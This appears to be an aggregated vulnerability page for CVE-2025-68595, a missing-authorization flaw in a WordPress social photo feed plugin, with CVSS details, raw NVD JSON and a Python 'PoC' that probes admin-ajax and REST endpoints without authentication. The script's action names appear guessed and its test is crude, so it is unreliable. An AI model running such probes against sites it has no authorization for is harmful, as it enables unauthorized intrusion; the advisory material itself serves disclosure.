Security Vulnerability Report
中文
CVE-2025-68595 CVSS 5.3 MEDIUM

CVE-2025-68595

Published: 2025-12-24 13:16:27
Last Modified: 2026-04-27 19:16:35

Description

Missing Authorization vulnerability in Trustindex Widgets for Social Photo Feed social-photo-feed-widget allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Widgets for Social Photo Feed: from n/a through <= 1.8.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Trustindex Widgets for Social Photo Feed <= 1.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-68595 PoC - Missing Authorization in Trustindex Social Photo Feed Plugin # Target: WordPress site with vulnerable Trustindex Social Photo Feed plugin def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2025-68595 """ endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/trustindex/v1/', '/?rest_route=/trustindex/v1/' ] # Vulnerable actions that should require authentication vulnerable_actions = [ 'ti_save_social_photo_feed', 'ti_get_social_photos', 'ti_refresh_cache', 'trustindex_photo_feed_action' ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-68595 - Missing Authorization in Social Photo Feed Widget") for endpoint in endpoints: for action in vulnerable_actions: try: # Test unauthenticated access if 'admin-ajax.php' in endpoint: data = {'action': action} response = requests.post(target_url + endpoint, data=data, timeout=10) else: response = requests.get(target_url + endpoint, timeout=10) # Check for successful response (indicating missing authorization) if response.status_code == 200: print(f"[!] VULNERABLE: {endpoint} accessible without auth") print(f"[!] Action: {action}") print(f"[!] Response preview: {response.text[:200]}") return True except Exception as e: print(f"[-] Error testing {endpoint}: {str(e)}") print("[*] Target may not be vulnerable or plugin not installed") return False if __name__ == '__main__': if len(sys.argv) > 1: target = sys.argv[1] check_vulnerability(target) else: print("Usage: python cve-2025-68595-poc.py <target_url>") print("Example: python cve-2025-68595-poc.py http://example.com")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68595", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:26.940", "lastModified": "2026-04-27T19:16:35.150", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Trustindex Widgets for Social Photo Feed social-photo-feed-widget allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Widgets for Social Photo Feed: from n/a through <= 1.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/social-photo-feed-widget/vulnerability/wordpress-widgets-for-social-photo-feed-plugin-1-7-7-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}